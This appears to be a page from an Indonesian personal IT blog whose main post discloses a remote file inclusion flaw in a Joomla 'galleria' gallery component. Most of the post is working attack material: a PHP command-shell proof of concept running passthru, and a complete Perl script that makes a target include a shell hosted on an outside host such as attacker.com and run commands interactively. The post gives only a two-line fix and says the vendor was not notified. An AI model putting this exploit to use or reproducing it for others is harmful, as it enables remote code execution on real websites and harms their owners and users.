LaGiPusHinGWitH ----- IT

About This Site

Teknologi Informasi sangatlah penting untuk menunjang kemajuan ilmu pengetahuan di Indonesia pada khususnya. Dan ini semua haruslah ditunjang dengan kemampuan yang sepadan dengan kemajuan teknologi itu sendiri, terlebih untuk para praktisi IT itu sendiri. Akhir kata "Selamat berkarya" untuk kita semua. koy^k^guy^ - Owner

Navigation

Home |

Calendar

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Statistics

This page has been viewed 264654 times
Page rendered in 0.2560 seconds
38 queries executed
Debug mode is on
Total Entries: 61
Total Comments: 17
Total Trackbacks: 42607
Most Recent Entry: 09/28/2010 09:19 pm
Most Recent Comment on: 09/28/2010 09:51 pm
Total Members: 1
Total Logged in members: 0
Total guests: 5
Total anonymous users: 0
Most Recent Visitor on: 06/02/2012 03:47 pm
The most visitors ever was 269 on 05/28/2011 03:07 pm

Referrers

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Joomla is free software, written in PHP Script released under GNU GPL Licence

##########################################
# galleria - A Picture Gallery #
# Copyright (C) 2004 #
# Homepage : http://www.binarydigit.at #
# Email : office@binarydigit.at #
# Version : 1.0 #
# License : GNU GPL Public License #
##########################################

-------------------------------------------------------

Vulnerability terjadi pada modules gallery

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: galleria.php pada folder modules/galleria.

---------------galleria.php--------------------------------

include_once($mosConfig_absolute_path."/components/com_galleria/
galleria.html.php");
include_once($mosConfig_absolute_path."/components/com_galleria/
config.galleria.php");
include_once($mosConfig_absolute_path."/administrator/components/
com_galleria/class.galleria.php");

html_galleria::show_header( $option, $Itemid );

switch( $task )
{
case ‘show_rubriks’:
show_rubriks ( $option, $Itemid );
break;

...
---------------------------------------------------------

Variabel $mosConfig_absolute_path tidak disanitasi .
Saat register_globals=on dan allow_fopenurl=on maka penyerang dapat meng-exploitasi kelemahan
ini dengan php injection script.

Poc/Exploit:
~~~~~~~~~~~

dir.txt
<?
echo "".passthru(' ls -la ; id ')."";
?>

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# Joomla Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl joomla.pl <target> <cmd shell location> <cmd shell variable>
# perl joomla http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: ($_GET[cmd]);
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use LWP::UserAgent;

$Directory = $ARGV[0];
$DirectoryCommand = $ARGV[1];
$command = $ARGV[2];

if($Directory!~/http:\/\// || $DirectoryCommand!~/http:\/\// || !$command){usage()}

head();

while()
{
print “[shell] \$”;
while(<STDIN>)
{
$cmdshell=$_;
chomp($cmdshell);

$exploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$Directory.’/components/com_galleria/
galleria.php?mosConfig_absolute_path=
‘.$DirectoryCommand.’?&’.$command.’=’.$cmdshell)
or die “\nCould Not connect\n”;

$res = $exploit->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmdshell) {print “\nPlease Enter a Command\n\n”; $return ="”;}

elsif ($return =~/failed to open stream: HTTP request failed!/ ||
$return =~/: Cannot execute a blank command in <b>/)
{print “\nCould Not Connect to cmd Host or Invalid Command Variable\n”;exit}
elsif ($return =~/^<br.\>.<b>Fatal.error/) {print “\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print “\r\n$finreturn\n\r”;
last;
}
else {print “[shell] \$”;}}}last;
sub head()
{
print “\n===================================================\r\n”;
print “ *Joomla Remote File Inclusion*\r\n”;
print “=====================================================\r\n”;
}
sub usage()
{
head();
print “ Usage: perl joomla.pl <target> <cmd shell location> <cmd shell variable>\r\n\n”;
print “ <Site> - Full path to Joomla site ex: http://www.site.com/ \r\n”;
print “ <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n”;
print “ <cmd variable> - Command variable used in php shell \r\n”;
print “=====================================================\r\n”;
print “ Bug Found by roninmorgue \r\n”;
print “ Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org \r\n”;
print “=====================================================\r\n”;
exit();
}

``````````````````````````````````
Solution/The Fix:
~~~~~~~~~~~~~~

Non-aktifkan module galleria/delete
Sanitasi script pada file galleria.php untuk mencegah vulnerability ini

Notification:
~~~~~~~~~~~

vendor belum dihubungi